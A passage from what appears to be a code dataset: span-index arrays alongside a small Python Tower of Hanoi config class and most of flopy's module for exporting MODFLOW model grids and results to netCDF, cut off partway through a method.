],
[
2001,
2008
],
[
2185,
2192
],
[
2515,
2522
]
],
[
[
364,
368
],
[
2010,
2014
],
[
2022,
2026
],
[
2194,
2198
],
[
2206,
2210
]
],
[
[
370,
377
],
[
780,
787
],
[
822,
829
],
[
863,
870
],
[
903,
910
],
[
961,
968
],
[
1002,
1009
],
[
2307,
2314
],
[
2351,
2358
],
[
2405,
2412
],
[
2552,
2559
],
[
2600,
2607
],
[
3038,
3045
],
[
3083,
3090
],
[
3189,
3196
],
[
3233,
3240
],
[
4116,
4123
],
[
4168,
4175
],
[
4305,
4312
],
[
4354,
4361
],
[
4403,
4410
],
[
4452,
4459
],
[
4500,
4507
],
[
4538,
4545
],
[
4610,
4617
],
[
4658,
4665
],
[
4706,
4713
],
[
4754,
4761
],
[
4801,
4808
],
[
4838,
4845
]
],
[
[
385,
392
],
[
2060,
2067
],
[
2244,
2251
]
],
[
[
394,
401
]
],
[
[
459,
468
]
],
[
[
1270,
1285
]
],
[
[
3276,
3286
]
]
] |
from disco import Disco
class Config:
def __init__(self):
self._numero_discos = int(input("\nInforme a quantidade de discos: "))
def adiciona_discos(self, torre_inicial):
discos = self.add_disco()
for ix in range(self._numero_discos):
torre_inicial.empilha(discos[ix])
def add_disco(self):
discos = []
arquivo = open('disco.txt', 'r')
for linha in arquivo:
discos.append(Disco(int(linha)))
return discos
def numero_discos(self):
return self._numero_discos
def status_torres(self, torres):
print('\nNumero de discos: ' + str(self._numero_discos))
for torre in torres:
torre.to_string()
| [
[
[
18,
23
],
[
460,
465
]
],
[
[
31,
37
]
]
] |
import os
import platform
import socket
import copy
import json
import numpy as np
from datetime import datetime
import time
from .metadata import acdd
import flopy
# globals
FILLVALUE = -99999.9
ITMUNI = {
0: "undefined",
1: "seconds",
2: "minutes",
3: "hours",
4: "days",
5: "years",
}
PRECISION_STRS = ["f4", "f8", "i4"]
STANDARD_VARS = ["longitude", "latitude", "layer", "elevation", "time"]
path = os.path.split(__file__)[0]
with open(path + "/longnames.json") as f:
NC_LONG_NAMES = json.load(f)
class Logger(object):
"""
Basic class for logging events during the linear analysis calculations
if a filename is passed, then a file handle is opened
Parameters
----------
filename : bool or str
if a string, the name of the log file to write; if a bool, the log is
written to the screen
echo : bool
a flag to force screen output in addition to the file
Attributes
----------
items : dict
tracks when something is started. If a log entry is
not in items, then it is treated as a new entry with the string
being the key and the datetime as the value. If a log entry is
in items, then the end time and delta time are written and
the item is popped from the keys
"""
def __init__(self, filename, echo=False):
self.items = {}
self.echo = bool(echo)
if filename == True:
self.echo = True
self.filename = None
elif filename:
self.filename = filename
self.f = open(filename, "w", 1)  # line-buffered; 0 (unbuffered) is not allowed for text mode in Python 3
self.t = datetime.now()
self.log("opening " + str(filename) + " for logging")
else:
self.filename = None
def log(self, phrase):
"""
log something that happened
Parameters
----------
phrase : str
the thing that happened
"""
t = datetime.now()
if phrase in self.items.keys():
s = (
str(t)
+ " finished: "
+ str(phrase)
+ ", took: "
+ str(t - self.items[phrase])
+ "\n"
)
if self.echo:
print(s,)
if self.filename:
self.f.write(s)
self.items.pop(phrase)
else:
s = str(t) + " starting: " + str(phrase) + "\n"
if self.echo:
print(s,)
if self.filename:
self.f.write(s)
self.items[phrase] = copy.deepcopy(t)
def warn(self, message):
"""
Write a warning to the log file
Parameters
----------
message : str
the warning text
"""
s = str(datetime.now()) + " WARNING: " + message + "\n"
if self.echo:
print(s,)
if self.filename:
self.f.write(s)
return
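# A minimal usage sketch of Logger (illustrative; not part of the original module):
#     log = Logger(True)            # echo to the screen, no log file
#     log.log("building netcdf")    # first call with a phrase records its start time
#     log.log("building netcdf")    # second call reports the elapsed time and pops the entry
#     log.warn("grid has no proj4 string")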
class NetCdf(object):
"""
Support for writing a netCDF4 compliant file from a flopy model
Parameters
----------
output_filename : str
Name of the .nc file to write
model : flopy model instance
time_values : the entries for the time dimension
if not None, the constructor will initialize
the file. If None, the perlen array of ModflowDis
will be used
z_positive : str ('up' or 'down')
Positive direction of vertical coordinates written to NetCDF file.
(default 'down')
verbose : if True, stdout is verbose. If str, then a log file
is written to the verbose file
forgive : what to do if a duplicate variable name is being created. If
True, then the newly requested var is skipped. If False, then
an exception is raised.
**kwargs : keyword arguments
modelgrid : flopy.discretization.Grid instance
user supplied model grid which will be used in lieu of the model
object modelgrid for netcdf production
Notes
-----
This class relies heavily on the grid and modeltime objects,
including these attributes: lenuni, itmuni, start_datetime, and proj4.
Make sure these attributes have meaningful values.
"""
def __init__(
self,
output_filename,
model,
time_values=None,
z_positive="up",
verbose=None,
prj=None,
logger=None,
forgive=False,
**kwargs
):
assert output_filename.lower().endswith(".nc")
if verbose is None:
verbose = model.verbose
if logger is not None:
self.logger = logger
else:
self.logger = Logger(verbose)
self.var_attr_dict = {}
self.log = self.logger.log
if os.path.exists(output_filename):
self.logger.warn("removing existing nc file: " + output_filename)
os.remove(output_filename)
self.output_filename = output_filename
self.forgive = bool(forgive)
self.model = model
self.model_grid = model.modelgrid
if "modelgrid" in kwargs:
self.model_grid = kwargs.pop("modelgrid")
self.model_time = model.modeltime
if prj is not None:
self.model_grid.proj4 = prj
if self.model_grid.grid_type == "structured":
self.dimension_names = ("layer", "y", "x")
STANDARD_VARS.extend(["delc", "delr"])
# elif self.model_grid.grid_type == 'vertex':
# self.dimension_names = ('layer', 'ncpl')
else:
raise Exception(
"Grid type {} not supported.".format(self.model_grid.grid_type)
)
self.shape = self.model_grid.shape
try:
import dateutil.parser
except:
print(
"python-dateutil is not installed\n"
+ "try pip install python-dateutil"
)
return
self.start_datetime = self._dt_str(
dateutil.parser.parse(self.model_time.start_datetime)
)
self.logger.warn("start datetime:{0}".format(str(self.start_datetime)))
proj4_str = self.model_grid.proj4
if proj4_str is None:
proj4_str = "epsg:4326"
self.log(
"Warning: model has no coordinate reference system specified. "
"Using default proj4 string: {}".format(proj4_str)
)
self.proj4_str = proj4_str
self.grid_units = self.model_grid.units
self.z_positive = z_positive
if self.grid_units is None:
self.grid_units = "undefined"
assert self.grid_units in ["feet", "meters", "undefined"], (
"unsupported length units: " + self.grid_units
)
self.time_units = self.model_time.time_units
# this gives us confidence that every NetCdf instance
# has the same attributes
self.log("initializing attributes")
self._initialize_attributes()
self.log("initializing attributes")
self.time_values_arg = time_values
self.log("initializing file")
self.initialize_file(time_values=self.time_values_arg)
self.log("initializing file")
def __add__(self, other):
new_net = NetCdf.zeros_like(self)
if np.isscalar(other) or isinstance(other, np.ndarray):
for vname in self.var_attr_dict.keys():
new_net.nc.variables[vname][:] = (
self.nc.variables[vname][:] + other
)
elif isinstance(other, NetCdf):
for vname in self.var_attr_dict.keys():
new_net.nc.variables[vname][:] = (
self.nc.variables[vname][:] + other.nc.variables[vname][:]
)
else:
raise Exception(
"NetCdf.__add__(): unrecognized other:{0}".format(
str(type(other))
)
)
return new_net
def __sub__(self, other):
new_net = NetCdf.zeros_like(self)
if np.isscalar(other) or isinstance(other, np.ndarray):
for vname in self.var_attr_dict.keys():
new_net.nc.variables[vname][:] = (
self.nc.variables[vname][:] - other
)
elif isinstance(other, NetCdf):
for vname in self.var_attr_dict.keys():
new_net.nc.variables[vname][:] = (
self.nc.variables[vname][:] - other.nc.variables[vname][:]
)
else:
raise Exception(
"NetCdf.__sub__(): unrecognized other:{0}".format(
str(type(other))
)
)
return new_net
def __mul__(self, other):
new_net = NetCdf.zeros_like(self)
if np.isscalar(other) or isinstance(other, np.ndarray):
for vname in self.var_attr_dict.keys():
new_net.nc.variables[vname][:] = (
self.nc.variables[vname][:] * other
)
elif isinstance(other, NetCdf):
for vname in self.var_attr_dict.keys():
new_net.nc.variables[vname][:] = (
self.nc.variables[vname][:] * other.nc.variables[vname][:]
)
else:
raise Exception(
"NetCdf.__mul__(): unrecognized other:{0}".format(
str(type(other))
)
)
return new_net
def __div__(self, other):
return self.__truediv__(other)
def __truediv__(self, other):
new_net = NetCdf.zeros_like(self)
with np.errstate(invalid="ignore"):
if np.isscalar(other) or isinstance(other, np.ndarray):
for vname in self.var_attr_dict.keys():
new_net.nc.variables[vname][:] = (
self.nc.variables[vname][:] / other
)
elif isinstance(other, NetCdf):
for vname in self.var_attr_dict.keys():
new_net.nc.variables[vname][:] = (
self.nc.variables[vname][:]
/ other.nc.variables[vname][:]
)
else:
raise Exception(
"NetCdf.__sub__(): unrecognized other:{0}".format(
str(type(other))
)
)
return new_net
def append(self, other, suffix="_1"):
assert isinstance(other, NetCdf) or isinstance(other, dict)
if isinstance(other, NetCdf):
for vname in other.var_attr_dict.keys():
attrs = other.var_attr_dict[vname].copy()
var = other.nc.variables[vname]
new_vname = vname
if vname in self.nc.variables.keys():
if vname not in STANDARD_VARS:
new_vname = vname + suffix
if "long_name" in attrs:
attrs["long_name"] += " " + suffix
else:
continue
assert (
new_vname not in self.nc.variables.keys()
), "var already exists:{0} in {1}".format(
new_vname, ",".join(self.nc.variables.keys())
)
attrs["max"] = var[:].max()
attrs["min"] = var[:].min()
new_var = self.create_variable(
new_vname, attrs, var.dtype, dimensions=var.dimensions
)
new_var[:] = var[:]
else:
for vname, array in other.items():
vname_norm = self.normalize_name(vname)
assert (
vname_norm in self.nc.variables.keys()
), "dict var not in " "self.vars:{0}-->".format(
vname
) + ",".join(
self.nc.variables.keys()
)
new_vname = vname_norm + suffix
assert new_vname not in self.nc.variables.keys()
attrs = self.var_attr_dict[vname_norm].copy()
attrs["max"] = np.nanmax(array)
attrs["min"] = np.nanmin(array)
attrs["name"] = new_vname
attrs["long_name"] = attrs["long_name"] + " " + suffix
var = self.nc.variables[vname_norm]
# assert var.shape == array.shape,\
# "{0} shape ({1}) doesn't make array shape ({2})".\
# format(new_vname,str(var.shape),str(array.shape))
new_var = self.create_variable(
new_vname, attrs, var.dtype, dimensions=var.dimensions
)
try:
new_var[:] = array
except:
new_var[:, 0] = array
return
def copy(self, output_filename):
new_net = NetCdf.zeros_like(self, output_filename=output_filename)
for vname in self.var_attr_dict.keys():
new_net.nc.variables[vname][:] = self.nc.variables[vname][:]
return new_net
@classmethod
def zeros_like(
cls, other, output_filename=None, verbose=None, logger=None
):
new_net = NetCdf.empty_like(
other,
output_filename=output_filename,
verbose=verbose,
logger=logger,
)
# add the vars to the instance
for vname in other.var_attr_dict.keys():
if new_net.nc.variables.get(vname) is not None:
new_net.logger.warn(
"variable {0} already defined, skipping".format(vname)
)
continue
new_net.log("adding variable {0}".format(vname))
var = other.nc.variables[vname]
data = var[:]
try:
mask = data.mask
data = np.array(data)
except:
mask = None
new_data = np.zeros_like(data)
new_data[mask] = FILLVALUE
new_var = new_net.create_variable(
vname,
other.var_attr_dict[vname],
var.dtype,
dimensions=var.dimensions,
)
new_var[:] = new_data
new_net.log("adding variable {0}".format(vname))
global_attrs = {}
for attr in other.nc.ncattrs():
if attr not in new_net.nc.ncattrs():
global_attrs[attr] = other.nc[attr]
new_net.add_global_attributes(global_attrs)
return new_net
@classmethod
def empty_like(
cls, other, output_filename=None, verbose=None, logger=None
):
if output_filename is None:
output_filename = (
str(time.mktime(datetime.now().timetuple())) + ".nc"
)
while os.path.exists(output_filename):
print("{}...already exists".format(output_filename))
output_filename = (
str(time.mktime(datetime.now().timetuple())) + ".nc"
)
print(
"creating temporary netcdf file..."
+ "{}".format(output_filename)
)
new_net = cls(
output_filename,
other.model,
time_values=other.time_values_arg,
verbose=verbose,
logger=logger,
)
return new_net
def difference(
self, other, minuend="self", mask_zero_diff=True, onlydiff=True
):
"""
make a new NetCDF instance that is the difference with another
netcdf file
Parameters
----------
other : either an str filename of a netcdf file or
a netCDF4 instance
minuend : (optional) the order of the difference operation.
Default is self (e.g. self - other). Can be "self" or "other"
mask_zero_diff : bool flag to mask differences that are zero. If
True, positions in the difference array that are zero will be set
to self.fillvalue
onlydiff : bool flag to only add non-zero diffs to output file
Returns
-------
net NetCDF instance
Notes
-----
assumes the current NetCDF instance has been populated. The
variable names and dimensions between the two files must match
exactly. The name of the new .nc file is
<self.output_filename>.diff.nc. The masks from both self and
other are carried through to the new instance
"""
assert self.nc is not None, (
"can't call difference() if nc " + "hasn't been populated"
)
try:
import netCDF4
except Exception as e:
mess = "error import netCDF4: {0}".format(str(e))
self.logger.warn(mess)
raise Exception(mess)
if isinstance(other, str):
assert os.path.exists(
other
), "filename 'other' not found:" + "{0}".format(other)
other = netCDF4.Dataset(other, "r")
assert isinstance(other, netCDF4.Dataset)
# check for similar variables
self_vars = set(self.nc.variables.keys())
other_vars = set(other.variables)
diff = self_vars.symmetric_difference(other_vars)
if len(diff) > 0:
self.logger.warn(
"variables are not the same between the two "
+ "nc files: "
+ ",".join(diff)
)
return
# check for similar dimensions
self_dimens = self.nc.dimensions
other_dimens = other.dimensions
for d in self_dimens.keys():
if d not in other_dimens:
self.logger.warn("missing dimension in other:{0}".format(d))
return
if len(self_dimens[d]) != len(other_dimens[d]):
self.logger.warn(
"dimension not consistent: "
+ "{0}:{1}".format(self_dimens[d], other_dimens[d])
)
return
# should be good to go
time_values = self.nc.variables.get("time")[:]
new_net = NetCdf(
self.output_filename.replace(".nc", ".diff.nc"),
self.model,
time_values=time_values,
)
# add the vars to the instance
for vname in self_vars:
if (
vname not in self.var_attr_dict
or new_net.nc.variables.get(vname) is not None
):
self.logger.warn("skipping variable: {0}".format(vname))
continue
self.log("processing variable {0}".format(vname))
s_var = self.nc.variables[vname]
o_var = other.variables[vname]
s_data = s_var[:]
o_data = o_var[:]
o_mask, s_mask = None, None
# keep the masks to apply later
if isinstance(s_data, np.ma.MaskedArray):
self.logger.warn("masked array for {0}".format(vname))
s_mask = s_data.mask
s_data = np.array(s_data)
s_data[s_mask] = 0.0
else:
np.nan_to_num(s_data)
if isinstance(o_data, np.ma.MaskedArray):
o_mask = o_data.mask
o_data = np.array(o_data)
o_data[o_mask] = 0.0
else:
np.nan_to_num(o_data)
# difference with self
if minuend.lower() == "self":
d_data = s_data - o_data
elif minuend.lower() == "other":
d_data = o_data - s_data
else:
mess = "unrecognized minuend {0}".format(minuend)
self.logger.warn(mess)
raise Exception(mess)
# check for non-zero diffs
if onlydiff and d_data.sum() == 0.0:
self.logger.warn(
"var {0} has zero differences, skipping...".format(vname)
)
continue
self.logger.warn(
"resetting diff attrs max,min:{0},{1}".format(
d_data.min(), d_data.max()
)
)
attrs = self.var_attr_dict[vname].copy()
attrs["max"] = np.nanmax(d_data)
attrs["min"] = np.nanmin(d_data)
# reapply masks
if s_mask is not None:
self.log("applying self mask")
s_mask[d_data != 0.0] = False
d_data[s_mask] = FILLVALUE
self.log("applying self mask")
if o_mask is not None:
self.log("applying other mask")
o_mask[d_data != 0.0] = False
d_data[o_mask] = FILLVALUE
self.log("applying other mask")
d_data[np.isnan(d_data)] = FILLVALUE
if mask_zero_diff:
d_data[np.where(d_data == 0.0)] = FILLVALUE
var = new_net.create_variable(
vname, attrs, s_var.dtype, dimensions=s_var.dimensions
)
var[:] = d_data
self.log("processing variable {0}".format(vname))
def _dt_str(self, dt):
""" for datetime to string for year < 1900
"""
dt_str = "{0:04d}-{1:02d}-{2:02d}T{3:02d}:{4:02d}:{5:02}Z".format(
dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second
)
return dt_str
def write(self):
"""write the nc object to disk"""
self.log("writing nc file")
assert (
self.nc is not None
), "netcdf.write() error: nc file not initialized"
# write any new attributes that have been set since
# initializing the file
for k, v in self.global_attributes.items():
try:
if self.nc.attributes.get(k) is not None:
self.nc.setncattr(k, v)
except Exception:
self.logger.warn(
"error setting global attribute {0}".format(k)
)
self.nc.sync()
self.nc.close()
self.log("writing nc file")
def _initialize_attributes(self):
"""private method to initial the attributes
of the NetCdf instance
"""
assert (
"nc" not in self.__dict__.keys()
), "NetCdf._initialize_attributes() error: nc attribute already set"
self.nc_epsg_str = "epsg:4326"
self.nc_crs_longname = "http://www.opengis.net/def/crs/EPSG/0/4326"
self.nc_semi_major = float(6378137.0)
self.nc_inverse_flat = float(298.257223563)
self.global_attributes = {}
self.global_attributes["namefile"] = self.model.namefile
self.global_attributes["model_ws"] = self.model.model_ws
self.global_attributes["exe_name"] = self.model.exe_name
self.global_attributes["modflow_version"] = self.model.version
self.global_attributes["create_hostname"] = socket.gethostname()
self.global_attributes["create_platform"] = platform.system()
self.global_attributes["create_directory"] = os.getcwd()
htol, rtol = -999, -999
try:
htol, rtol = self.model.solver_tols()
except Exception as e:
self.logger.warn(
"unable to get solver tolerances:" + "{0}".format(str(e))
)
self.global_attributes["solver_head_tolerance"] = htol
self.global_attributes["solver_flux_tolerance"] = rtol
spatial_attribs = {
"xll": self.model_grid.xoffset,
"yll": self.model_grid.yoffset,
"rotation": self.model_grid.angrot,
"proj4_str": self.model_grid.proj4,
}
for n, v in spatial_attribs.items():
self.global_attributes["flopy_sr_" + n] = v
self.global_attributes[
"start_datetime"
] = self.model_time.start_datetime
self.fillvalue = FILLVALUE
# initialize attributes
self.grid_crs = None
self.zs = None
self.ys = None
self.xs = None
self.nc = None
def initialize_geometry(self):
""" initialize the geometric information
needed for the netcdf file
"""
try:
import pyproj
except ImportError as e:
raise ImportError(
"NetCdf error importing pyproj module:\n" + str(e)
)
from distutils.version import LooseVersion
# Check if using newer pyproj version conventions
pyproj220 = LooseVersion(pyproj.__version__) >= LooseVersion("2.2.0")
proj4_str = self.proj4_str
print("initialize_geometry::proj4_str = {}".format(proj4_str))
self.log("building grid crs using proj4 string: {}".format(proj4_str))
if pyproj220:
self.grid_crs = pyproj.CRS(proj4_str)
else:
self.grid_crs = pyproj.Proj(proj4_str, preserve_units=True)
print("initialize_geometry::self.grid_crs = {}".format(self.grid_crs))
vmin, vmax = self.model_grid.botm.min(), self.model_grid.top.max()
if self.z_positive == "down":
vmin, vmax = vmax, vmin
else:
self.zs = self.model_grid.xyzcellcenters[2].copy()
ys = self.model_grid.xyzcellcenters[1].copy()
xs = self.model_grid.xyzcellcenters[0].copy()
# Transform to a known CRS
if pyproj220:
nc_crs = pyproj.CRS(self.nc_epsg_str)
self.transformer = pyproj.Transformer.from_crs(
self.grid_crs, nc_crs, always_xy=True
)
else:
nc_crs = pyproj.Proj(self.nc_epsg_str)
self.transformer = None
print("initialize_geometry::nc_crs = {}".format(nc_crs))
if pyproj220:
print(
"transforming coordinates using = {}".format(self.transformer)
)
self.log("projecting grid cell center arrays")
if pyproj220:
self.xs, self.ys = self.transformer.transform(xs, ys)
else:
self.xs, self.ys = pyproj.transform(self.grid_crs, nc_crs, xs, ys)
# get transformed bounds and record to check against ScienceBase later
xmin, xmax, ymin, ymax = self.model_grid.extent
bbox = np.array(
[[xmin, ymin], [xmin, ymax], [xmax, ymax], [xmax, ymin]]
)
if pyproj220:
x, y = self.transformer.transform(*bbox.transpose())
else:
x, y = pyproj.transform(self.grid_crs, nc_crs, *bbox.transpose())
self.bounds = x.min(), y.min(), x.max(), y.max()
self.vbounds = vmin, vmax
def initialize_file(self, time_values=None):
"""
initialize the netcdf instance, including global attributes,
dimensions, and grid information
Parameters
----------
time_values : list of times to use as time dimension
entries. If none, then use the times in
self.model.dis.perlen and self.start_datetime
"""
if self.nc is not None:
raise Exception("nc file already initialized")
if self.grid_crs is None:
self.log("initializing geometry")
self.initialize_geometry()
self.log("initializing geometry")
try:
import netCDF4
except Exception as e:
self.logger.warn("error importing netCDF module")
msg = "NetCdf error importing netCDF4 module:\n" + str(e)
raise Exception(msg)
# open the file for writing
try:
self.nc = netCDF4.Dataset(self.output_filename, "w")
except Exception as e:
msg = "error creating netcdf dataset:\n{}".format(str(e))
raise Exception(msg)
# write some attributes
self.log("setting standard attributes")
self.nc.setncattr(
"Conventions",
"CF-1.6, ACDD-1.3, flopy {}".format(flopy.__version__),
)
self.nc.setncattr(
"date_created", datetime.utcnow().strftime("%Y-%m-%dT%H:%M:00Z")
)
self.nc.setncattr(
"geospatial_vertical_positive", "{}".format(self.z_positive)
)
min_vertical = np.min(self.zs)
max_vertical = np.max(self.zs)
self.nc.setncattr("geospatial_vertical_min", min_vertical)
self.nc.setncattr("geospatial_vertical_max", max_vertical)
self.nc.setncattr("geospatial_vertical_resolution", "variable")
self.nc.setncattr("featureType", "Grid")
for k, v in self.global_attributes.items():
try:
self.nc.setncattr(k, v)
except:
self.logger.warn(
"error setting global attribute {0}".format(k)
)
self.global_attributes = {}
self.log("setting standard attributes")
# spatial dimensions
self.log("creating dimensions")
# time
if time_values is None:
time_values = np.cumsum(self.model_time.perlen)
self.nc.createDimension("time", len(time_values))
for name, length in zip(self.dimension_names, self.shape):
self.nc.createDimension(name, length)
self.log("creating dimensions")
self.log("setting CRS info")
# Metadata variables
crs = self.nc.createVariable("crs", "i4")
crs.long_name = self.nc_crs_longname
crs.epsg_code = self.nc_epsg_str
crs.semi_major_axis = self.nc_semi_major
crs.inverse_flattening = self.nc_inverse_flat
self.log("setting CRS info")
attribs = {
"units": "{} since {}".format(
self.time_units, self.start_datetime
),
"standard_name": "time",
"long_name": NC_LONG_NAMES.get("time", "time"),
"calendar": "gregorian",
"_CoordinateAxisType": "Time",
}
time = self.create_variable(
"time", attribs, precision_str="f8", dimensions=("time",)
)
self.logger.warn("time_values:{0}".format(str(time_values)))
time[:] = np.asarray(time_values)
# Elevation
attribs = {
"units": self.model_grid.units,
"standard_name": "elevation",
"long_name": NC_LONG_NAMES.get("elevation", "elevation"),
"axis": "Z",
"valid_min": min_vertical,
"valid_max": max_vertical,
"positive": self.z_positive,
}
elev = self.create_variable(
"elevation",
attribs,
precision_str="f8",
dimensions=self.dimension_names,
)
elev[:] = self.zs
# Longitude
attribs = {
"units": "degrees_east",
"standard_name": "longitude",
"long_name": NC_LONG_NAMES.get("longitude", "longitude"),
"axis": "X",
"_CoordinateAxisType": "Lon",
}
lon = self.create_variable(
"longitude",
attribs,
precision_str="f8",
dimensions=self.dimension_names[1:],
)
lon[:] = self.xs
self.log("creating longitude var")
# Latitude
self.log("creating latitude var")
attribs = {
"units": "degrees_north",
"standard_name": "latitude",
"long_name": NC_LONG_NAMES.get("latitude", "latitude"),
"axis": "Y",
"_CoordinateAxisType": "Lat",
}
lat = self.create_variable(
"latitude",
attribs,
precision_str="f8",
dimensions=self.dimension_names[1:],
)
lat[:] = self.ys
# x
self.log("creating x var")
attribs = {
"units": self.model_grid.units,
"standard_name": "projection_x_coordinate",
"long_name": NC_LONG_NAMES.get("x", "x coordinate of projection"),
"axis": "X",
}
x = self.create_variable(
"x_proj",
attribs,
precision_str="f8",
dimensions=self.dimension_names[1:],
)
x[:] = self.model_grid.xyzcellcenters[0]
# y
self.log("creating y var")
attribs = {
"units": self.model_grid.units,
"standard_name": "projection_y_coordinate",
"long_name": NC_LONG_NAMES.get("y", "y coordinate of projection"),
"axis": "Y",
}
y = self.create_variable(
"y_proj",
attribs,
precision_str="f8",
dimensions=self.dimension_names[1:],
)
y[:] = self.model_grid.xyzcellcenters[1]
# grid mapping variable
crs = flopy.utils.reference.crs(
prj=self.model_grid.prj, epsg=self.model_grid.epsg
)
attribs = crs.grid_mapping_attribs
if attribs is not None:
self.log("creating grid mapping variable")
self.create_variable(
attribs["grid_mapping_name"], attribs, precision_str="f8"
)
# layer
self.log("creating layer var")
attribs = {
"units": "",
"standard_name": "layer",
"long_name": NC_LONG_NAMES.get("layer", "layer"),
"positive": "down",
"axis": "Z",
}
lay = self.create_variable("layer", attribs, dimensions=("layer",))
lay[:] = np.arange(0, self.shape[0])
self.log("creating layer var")
if self.model_grid.grid_type == "structured":
# delc
attribs = {
"units": self.model_grid.units.strip("s"),
"long_name": NC_LONG_NAMES.get(
"delc", "Model grid cell spacing along a column"
),
}
delc = self.create_variable("delc", attribs, dimensions=("y",))
delc[:] = self.model_grid.delc[::-1]
if self.model_grid.angrot != 0:
delc.comments = (
"This is the row spacing that applied to the UNROTATED grid. "
+ "This grid HAS been rotated before being saved to NetCDF. "
+ "To compute the unrotated grid, use the origin point and this array."
)
# delr
attribs = {
"units": self.model_grid.units.strip("s"),
"long_name": NC_LONG_NAMES.get(
"delr", "Model grid cell spacing along a row"
),
}
delr = self.create_variable("delr", attribs, dimensions=("x",))
delr[:] = self.model_grid.delr[::-1]
if self.model_grid.angrot != 0:
delr.comments = (
"This is the col spacing that applied to the UNROTATED grid. "
+ "This grid HAS been rotated before being saved to NetCDF. "
+ "To compute the unrotated grid, use the origin point and this array."
)
# else:
# vertices
# attribs = {"units": self.model_grid.lenuni.strip('s'),
# "long_name": NC_LONG_NAMES.get("vertices",
# "List of vertices used in the model by cell"),
# }
# vertices = self.create_variable('vertices', attribs, dimensions=('ncpl',))
# vertices[:] = self.model_grid.vertices
# Workaround for CF/CDM.
# http://www.unidata.ucar.edu/software/thredds/current/netcdf-java/
# reference/StandardCoordinateTransforms.html
# "explicit_field"
exp = self.nc.createVariable("VerticalTransform", "S1")
exp.transform_name = "explicit_field"
exp.existingDataField = "elevation"
exp._CoordinateTransformType = "vertical"
exp._CoordinateAxes = "layer"
return
def initialize_group(
self,
group="timeseries",
dimensions=("time",),
attributes=None,
dimension_data=None,
):
"""
Method to initialize a new group within a netcdf file. This group
can have independent dimensions from the global dimensions
Parameters
----------
group : str
name of the netcdf group
dimensions : tuple
data dimension names for the group
attributes : dict
nested dictionary of {dimension : {attributes}} for each netcdf
group dimension
dimension_data : dict
dictionary of {dimension : [data]} for each netcdf group dimension
"""
if attributes is None:
attributes = {}
if dimension_data is None:
dimension_data = {}
if self.nc is None:
self.initialize_file()
if group in self.nc.groups:
raise AttributeError("{} group already initialized".format(group))
self.log("creating netcdf group {}".format(group))
self.nc.createGroup(group)
self.log("{} group created".format(group))
self.log("creating {} group dimensions".format(group))
for dim in dimensions:
if dim == "time":
if "time" not in dimension_data:
time_values = np.cumsum(self.model_time.perlen)
else:
time_values = dimension_data["time"]
self.nc.groups[group].createDimension(dim, len(time_values))
else:
if dim not in dimension_data:
raise AssertionError(
"{} information must be supplied "
"to dimension data".format(dim)
)
else:
self.nc.groups[group].createDimension(
dim, len(dimension_data[dim])
)
self.log("created {} group dimensions".format(group))
dim_names = tuple([i for i in dimensions if i != "time"])
for dim in dimensions:
if dim.lower() == "time":
if "time" not in attributes:
unit_value = "{} since {}".format(
self.time_units, self.start_datetime
)
attribs = {
"units": unit_value,
"standard_name": "time",
"long_name": NC_LONG_NAMES.get("time", "time"),
"calendar": "gregorian",
"Axis": "Y",
"_CoordinateAxisType": "Time",
}
else:
attribs = attributes["time"]
time = self.create_group_variable(
group,
"time",
attribs,
precision_str="f8",
dimensions=("time",),
)
time[:] = np.asarray(time_values)
elif dim.lower() == "zone":
if "zone" not in attributes:
attribs = {
"units": "N/A",
"standard_name": "zone",
"long_name": "zonebudget zone",
"Axis": "X",
"_CoordinateAxisType": "Zone",
}
else:
attribs = attributes["zone"]
zone = self.create_group_variable(
group,
"zone",
attribs,
precision_str="i4",
dimensions=("zone",),
)
zone[:] = np.asarray(dimension_data["zone"])
else:
attribs = attributes[dim]
var = self.create_group_variable(
group,
dim,
attribs,
precision_str="f8",
dimensions=dim_names,
)
var[:] = np.asarray(dimension_data[dim])
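    # Usage sketch (hypothetical, not part of the original source): assuming an
    # already-initialized NetCdf instance `ncf`, a group with its own time and
    # zone dimensions could be added roughly like this:
    #   ncf.initialize_group(
    #       "zonebudget",
    #       dimensions=("time", "zone"),
    #       dimension_data={"zone": [1, 2, 3]},
    #   )
    #   zvar = ncf.create_group_variable(
    #       "zonebudget", "budget", {"units": "m^3/d"},
    #       precision_str="f8", dimensions=("time",),
    #   )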
@staticmethod
def normalize_name(name):
return name.replace(".", "_").replace(" ", "_").replace("-", "_")
def create_group_variable(
self, group, name, attributes, precision_str, dimensions=("time",)
):
"""
Create a new group variable in the netcdf object
Parameters
----------
name : str
the name of the variable
attributes : dict
attributes to add to the new variable
precision_str : str
netcdf-compliant string. e.g. f4
dimensions : tuple
which dimensions the variable applies to
default : ("time","layer","x","y")
group : str
which netcdf group the variable goes in
default : None which creates the variable in root
Returns
-------
nc variable
Raises
------
        AssertionError if precision_str is not a supported precision string
        AssertionError if variable name already in netcdf object
        AssertionError if one or more dimensions do not exist
"""
name = self.normalize_name(name)
if (
name in STANDARD_VARS
and name in self.nc.groups[group].variables.keys()
):
return
if name in self.nc.groups[group].variables.keys():
if self.forgive:
self.logger.warn(
"skipping duplicate {} group variable: {}".format(
group, name
)
)
return
else:
raise Exception(
"duplicate {} group variable name: {}".format(group, name)
)
self.log("creating group {} variable: {}".format(group, name))
if precision_str not in PRECISION_STRS:
raise AssertionError(
"netcdf.create_variable() error: precision "
"string {} not in {}".format(precision_str, PRECISION_STRS)
)
if group not in self.nc.groups:
raise AssertionError(
"netcdf group `{}` must be created before "
"variables can be added to it".format(group)
)
self.var_attr_dict["{}/{}".format(group, name)] = attributes
var = self.nc.groups[group].createVariable(
name,
precision_str,
dimensions,
fill_value=self.fillvalue,
zlib=True,
)
for k, v in attributes.items():
try:
var.setncattr(k, v)
            except Exception:
                self.logger.warn(
                    "error setting attribute "
                    + "{} for group {} variable {}".format(k, group, name)
)
self.log("creating group {} variable: {}".format(group, name))
return var
def create_variable(
self,
name,
attributes,
precision_str="f4",
dimensions=("time", "layer"),
group=None,
):
"""
Create a new variable in the netcdf object
Parameters
----------
name : str
the name of the variable
attributes : dict
attributes to add to the new variable
precision_str : str
netcdf-compliant string. e.g. f4
dimensions : tuple
which dimensions the variable applies to
default : ("time","layer","x","y")
group : str
which netcdf group the variable goes in
default : None which creates the variable in root
Returns
-------
nc variable
Raises
------
        AssertionError if precision_str is not a supported precision string
        AssertionError if variable name already in netcdf object
        AssertionError if one or more dimensions do not exist
"""
# Normalize variable name
name = self.normalize_name(name)
# if this is a core var like a dimension...
# long_name = attributes.pop("long_name",name)
if name in STANDARD_VARS and name in self.nc.variables.keys():
return
if (
name not in self.var_attr_dict.keys()
